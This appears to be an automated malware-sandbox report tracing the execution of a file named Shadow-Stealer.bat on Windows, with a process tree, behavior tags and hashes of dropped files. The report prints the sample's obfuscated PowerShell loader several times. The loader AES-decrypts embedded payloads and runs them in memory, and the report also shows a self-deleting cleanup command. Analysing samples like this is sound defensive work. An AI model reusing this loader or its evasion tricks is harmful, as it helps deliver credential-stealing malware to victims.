C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4852 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5692 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4696 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3548 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3432 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6364 /prefetch:83⤵
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{f98e93b1-ae13-45dd-baab-43ff5f8a4d5a}5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{6e8d0acd-a966-4f47-a7a5-dca899832231}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV16⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --gpu-preferences=SAAAAAAAAADoAAAwAAAAAAAAAAAAAAAAAABgAAAQAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=6132 /prefetch:23⤵
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Windows directory
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{80bbc7d5-0111-463f-b649-8038ea64b44e}5⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{093674e6-d474-4d5d-9108-e374821f2f0b}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit5⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 86⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"6⤵
- Views/modifies file attributes
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5916 /prefetch:13⤵
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1876,12252140788525508075,13929273325574559245,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6676 /prefetch:83⤵
- NTFS ADS
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\Downloads\Shadow-Stealer.bat" "3⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));4⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{0dd0192d-dd8f-4392-9f8b-5dca309c3c58}5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\Downloads\Shadow-Stealer.bat"2⤵
-
C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"Shadow-Stealer.bat.exe" -noprofile -windowstyle hidden -ep bypass -command function pXqKy($AMMuC){ $QAuMi=[System.Security.Cryptography.Aes]::Create(); $QAuMi.Mode=[System.Security.Cryptography.CipherMode]::CBC; $QAuMi.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $QAuMi.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('loy14lThS3SgWk7zmlM+U1LaSbD9l9+GRTu5mLzp2mM='); $QAuMi.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('lS2YpgJeBrTrEw/fJyL2OQ=='); $LSyot=$QAuMi.CreateDecryptor(); $return_var=$LSyot.TransformFinalBlock($AMMuC, 0, $AMMuC.Length); $LSyot.Dispose(); $QAuMi.Dispose(); $return_var;}function YaPup($AMMuC){ $BpqPy=New-Object System.IO.MemoryStream(,$AMMuC); $MUxyL=New-Object System.IO.MemoryStream; $QRzEr=New-Object System.IO.Compression.GZipStream($BpqPy, [IO.Compression.CompressionMode]::Decompress); $QRzEr.CopyTo($MUxyL); $QRzEr.Dispose(); $BpqPy.Dispose(); $MUxyL.Dispose(); $MUxyL.ToArray();}function dAvUr($AMMuC,$oAPri){ $TIrdu=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$AMMuC); $cmozY=$TIrdu.EntryPoint; $cmozY.Invoke($null, $oAPri);}$agzCo=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')('C:\Users\Admin\Downloads\Shadow-Stealer.bat').Split([Environment]::NewLine);foreach ($xWgWP in $agzCo) { if ($xWgWP.StartsWith('SEROXEN')) { $gZeLJ=$xWgWP.Substring(7); break; }}$paQQY=[string[]]$gZeLJ.Split('\');$ahdVx=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[0])));$qbiwj=YaPup (pXqKy ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($paQQY[1])));dAvUr $qbiwj (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));dAvUr $ahdVx (,[string[]] ('', 'idTznCCsreqaEEjvuwzuTuitglIVMFHEuLsTnnuHsLwyMmxaqK', 'LkIzMJCsatThEdeYOSSAwnZMOfyqejPcYtnoxQiuObLPDohIJN'));3⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{9c278b0c-67f1-438c-8d20-f1d1faae9569}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{8a5775b4-0c43-41db-a226-0ea67b9f7285}4⤵
-
C:\Windows\SysWOW64\dllhost.exeC:\Windows\SysWOW64\dllhost.exe /Processid:{e6c14402-cd06-4476-ae72-0aee4a527774}4⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6056 -s 1565⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C PING localhost -n 8 >NUL & taskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & ATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & del /f "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe" & exit4⤵
-
C:\Windows\system32\PING.EXEPING localhost -n 85⤵
- Runs ping.exe
-
C:\Windows\system32\taskkill.exetaskkill /F /IM "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Kills process with taskkill
-
C:\Windows\system32\attrib.exeATTRIB -h -s "C:\Users\Admin\Downloads\Shadow-Stealer.bat.exe"5⤵
- Views/modifies file attributes
-
C:\Windows\System32\NOTEPAD.EXE"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\Downloads\Shadow-Stealer.bat2⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Appinfo1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k UdkSvcGroup -s UdkUserSvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k osprivacy -p -s camsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵
-
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe" -ServerName:MiniSearchUI.AppXj3y73at8fy1htwztzxs68sxx1v7cksp7.mca1⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k WerSvcGroup1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 564 -p 6604 -ip 66042⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 468 -p 7008 -ip 70082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -pss -s 688 -p 6108 -ip 61082⤵
- Suspicious use of NtCreateProcessExOtherParentProcess
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 700 -p 6260 -ip 62602⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 712 -p 6056 -ip 60562⤵
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵
Network
MITRE ATT&CK Matrix ATT&CK v13
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.533636be-f85f-4ec7-bd5b-0d9c5b50edda.tmp.csvFilesize
42KB
MD517029652ea9120d890f025b846f586bf
SHA18d8ef714792fc0e6f71f905295dc03bbd73fc36e
SHA256793bfa45efb0db4e9b41a6393b2a950d66a72fb7a71637c3c47010beb11a0afa
SHA5127386d0769c0cb89727a7d2aefbaed02349cbc0e40f91acffba108f24bee864df1ea10f596349d0a1b46f4cf52d1a2d430030524a6a50288b739c444700b248b2
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.89a2a5c3-6b8f-425f-864e-04a0dcff4a4b.tmp.txtFilesize
13KB
MD5ab7af922bb41dd3935690b19783eb26c
SHA1ad0a092713fd9400be3bed0519c9f10ea12ebceb
SHA256db60c3dca0910df96f1266704723dbea70e537f82f6f944b2c59b3b829960843
SHA51204d2af86e4ee476c53c79da2d62be893cf622c2c219f283b4d58e9fb1cc7f0743e722fa682bdb3c8c2cea9d2fd9cfc4b8f8dc1e47272711cde7119cac2ea2ce4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.bfdc0f92-9444-41d2-9a3e-66379d1eaaf8.tmp.csvFilesize
41KB
MD5644830d5ae2523c9095228d6d6acf88c
SHA1547cab9068438d582efd244c12a13c9ea0f6b39f
SHA25670c6a616184c0ddc4db4389f355ad7f645a519b0b74939076f02cb102bb0aa78
SHA512a47bad64afe39497d92f12df76063e49ce1193a8b61d4203381140e220360214c7dfbbe1a7549bfbf6853c63eadccc68577688a62e2a6f44877c601dc61b20b4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d37b24ac-3403-4bf7-aa49-fd8b6a2aa58a.tmp.txtFilesize
13KB
MD507f3e8f9effb289523a32be3951da7ee
SHA16ee9e17443b3ee765c027e6585967e04161d875f
SHA256f4506e5420b84c1e081b26190619c071445caceaaafa2be5324ad68b32719f30
SHA512af21b370c7a5a7d8b09c02c01705ca95ff335ef9e977f038da7697c447536503cc364b53f91d0caec2f8b4abcb533b91556109f10f1336caca5d2cbe9696aee4
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.d8652241-622d-4508-9a09-da436c34af3a.tmp.txtFilesize
13KB
MD55039c1cdea9659d255897a1fe739f2cb
SHA10e3a68b1174e2e228e50a72787a5987eafc94642
SHA256788063fe5b69ee5d917a38e9f464dba9e17aaa3c50f9493c9c3fd56ba7d1a2ba
SHA51295e61ac4993cf0d64def5e0848fe65563d3190a7a3c5085f39a0c5e99e09212295b08be7e94603728ec657c828dd2e99bb043ae41c1eb7cbf9db3263971b895e
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.dd145f68-0ee5-405b-abda-1827dfe39a33.tmp.txtFilesize
13KB
MD5bd85a748349d95fd9e89d2a520264384
SHA1528ecd2fa32f014d84cd7a3f7c46c34785b86db7
SHA25649853fcc7dd7160b3bc932da01cb6191de009cce16e94a3fd30274313a11407b
SHA5123dfd1c5ad1774ab6f942f3e20119a83d4cc2aa659e795bbedb634f88dd081b2514f7ce5fefdb8a26695144c37eed9395a7876a66cd8f15e8c84eb4b55a2ec454
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.de215c06-3155-46f8-8318-255d1261d459.tmp.csvFilesize
42KB
MD5ff5d52c50b73932c09c143c7c4c8765d
SHA1235f7451b4a939b92533b4f74218bfec3be69260
SHA2565ef56fe09209ae7e0a384dbeeaa875f2e72d24b7411efb2e8f97650e401e4e07
SHA51250afb137d9a372be8dd1221a3a0514aabf6fc9750b6500632b5cc1c99d5c68c22ba1f400c92eda8429468aa4adabeab1a4fd5adf58859606e5cbfcb8ee0dc662
-
C:\ProgramData\Microsoft\Windows\WER\Temp\WER.e60bf691-4917-45e0-a87b-3bc479c13f26.tmp.csvFilesize
42KB
MD534d573a3f2a9e5d66ea8409ef14f8415
SHA1fadbef7c0cc09ecd9de7cd2c0b54bf3e41fa6657
SHA2566c6929277d5fc9bda564c71ca62fdc40a191b7c99370311264306f0b57799014
SHA5129796f31282c7df3ce3997332b25b80a929a653e6c4a011145ca6beb709d48b1a7deb21c0a424bc889045fa5aa84324c631caaa969176fb05b8543a160d451247
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Shadow-Stealer.bat.exe.logFilesize
3KB
MD5918925b4ffb522c4188485a5e84ab6ed
SHA1f53ee7bacfae671d898075778f668cbf727c5d5e
SHA25618d5722b4bdd546da121b4c8756096755cab8cb7c40126d93644910d9292f343
SHA51282d4b87cc804c393a5c812a4dc327743ae928a44f8fd52902410ba43dfae738254e94437b0482c86a93dea416fcb87a34ed892f8541c7508545b3c98dfd4d8ea
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5f717f56b5d8e2e057c440a5a81043662
SHA10ad6c9bbd28dab5c9664bad04db95fd50db36b3f
SHA2564286cd3f23251d0a607e47eccb5e0f4af8542d38b32879d2db2ab7f4e6031945
SHA51261e263935d51028ec0aab51b938b880945a950cec9635a0dafddf795658ea0a2dfcf9cfc0cab5459b659bb7204347b047a5c6b924fabea44ce389b1cbb9867d6
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad\settings.datFilesize
152B
MD5196eaa9f7a574c29bd419f9d8c2d9349
SHA119982d15d1e2688903b0a3e53a8517ab537b68ed
SHA256df1e96677bcfffe5044826aa14a11e85ef2ebb014ee9e890e723a14dc5f31412
SHA512e066d74da36a459c19db30e68b703ec9f92019f2d5f24fd476a5fd3653c0b453871e2c08cdc47f2b4d4c4be19ff99e6ef3956d93b2d7d0a69645577d44125ac7
-
C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cache\f_000016Filesize
118KB
MD58907aef87f7d901c97d6c3699fd8d1a6
SHA1a3429685ca3bb031738858e86f72a74698c147a7
SHA2569b4f6d5162b94e469fa6467a9a9a5186c8abf1e42358b9bf9dd0900744e57909
SHA51293d0df9549197304ead7baf299a308f7b1fded1cc3dc9b1354fb46f777504e71f9d0cb05aa38d151e7aa4feed0ee35a0e46acddab29607b80eb39ad27b4cae18
-
